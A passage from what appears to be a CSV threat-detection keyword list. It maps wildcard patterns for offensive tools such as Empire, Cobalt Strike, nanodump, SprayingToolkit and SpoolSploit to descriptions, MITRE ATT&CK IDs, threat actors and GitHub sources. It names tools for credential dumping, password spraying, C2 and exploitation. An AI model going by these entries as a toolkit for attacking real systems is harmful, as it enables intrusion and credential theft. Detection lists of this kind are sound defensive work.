tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*Spel_RCE_Bash_EXP.py*","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Spel_RCE_POC.py*","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A",,"N/A",,, +"*spiderfoot -l 127.0.0.1:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*spiderfoot-cli -s http*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*-SpiderFoot-correlations.csv*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*spiderfoot-master*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*SpiderLabs/DoHC2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*SpiderLabs/Responder*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*spindrift.py *--target *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*spindrift.py --domain*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*SplashtopStreamer3500.exe* prevercheck *","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" +"*splunk/upload_app_exec/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*splunk_whisperer.py*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*splunk_whisperer-master*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*SplunkWhisperer2-master*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*-spn * -clsid * -shadowcred*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*spnroast_*.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*spoof_wani*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*spoof_wlan_creds*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*--spoof-callstack *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*SpooferHostsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferHostsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIPsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIPsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferLearningDelay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferLearningInterval*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferRepeat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*Spoofy/spoofy.py*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*SpookFlare*","offensive_tool_keyword","SpookFlare","SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.","T1027 - T1029 - T1218 - T1112","TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hlldz/SpookFlare","1","0","N/A","N/A","10","925","201","2019-05-08T09:03:45Z","2017-11-13T17:22:12Z" +"*spookflare.py*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*spool_sploit.py*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*spooler_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*SpoolSample.exe * *","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*SpoolSample_v4.5_x64.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SpoolSploit/*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*spoolsploit:latest*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*spoolss_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*spoolsystem inject*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*spoolsystem spawn*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 